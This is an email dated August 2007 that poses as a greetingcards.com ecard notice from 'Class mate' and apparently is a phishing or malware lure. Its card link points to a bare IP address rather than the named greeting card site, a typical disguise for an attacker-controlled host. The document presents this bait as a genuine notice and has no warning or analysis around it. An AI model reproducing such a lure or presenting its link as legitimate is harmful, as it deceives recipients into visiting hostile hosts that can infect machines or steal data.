Subject: Class mate sent you a greeting ecard from greetingcards.com!

From: "greetingcards.com" <[email-masked]>
Date: Fri, 10 Aug 2007 17:16:47 +0200

Class mate has created an ecard for you at greetingcards.com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 3a3b01bdad81d9b848ca9a885b5e6291c 

To see your custom greeting card, simply click on the link below: 
http://75.37.228.11/?3a3b01bdad81d9b848ca9a885b5e6291c

Send greeting cards from greetingcards.com whenever you want by visiting us at: 
http://greetingcards.com/
Copyright (c) 1996-2007 greetingcards.com All Rights Reserved